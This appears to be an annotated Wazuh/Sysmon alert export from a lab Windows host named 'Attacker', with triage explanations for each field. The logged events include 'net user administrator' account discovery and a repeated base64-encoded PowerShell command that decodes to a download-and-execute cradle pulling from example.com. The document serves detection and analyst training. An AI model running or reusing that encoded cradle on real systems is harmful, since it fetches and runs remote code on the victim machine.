ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:49.142 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc5-680a-b10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 19 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.975453 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:49.7003462Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282235 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:46.658
ProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00}
ProcessId: 1148
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00}
ParentProcessId: 8908
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:46.658 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 23 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.983515 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:49.9158126Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282239 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:49.897
ProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00}
ProcessId: 1148
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_0gxqrd3j.oe2.ps1
CreationUtcTime: 2025-04-24 22:35:49.897
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:49.897 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0gxqrd3j.oe2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:49.897 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.986279 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:51.6610611Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282272 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:51.490
ProcessGuid: {94294ddc-bcc7-680a-b50a-000000000e00}
ProcessId: 10700
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcc5-680a-b10a-000000000e00}
ParentProcessId: 12028
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user administrator
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:51.490 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc7-680a-b50a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10700 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc5-680a-b10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 20 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.991423 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:52.6827009Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282279 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:50.858
ProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00}
ProcessId: 9592
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00}
ParentProcessId: 1148
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:50.858 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc6-680a-b30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9592 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
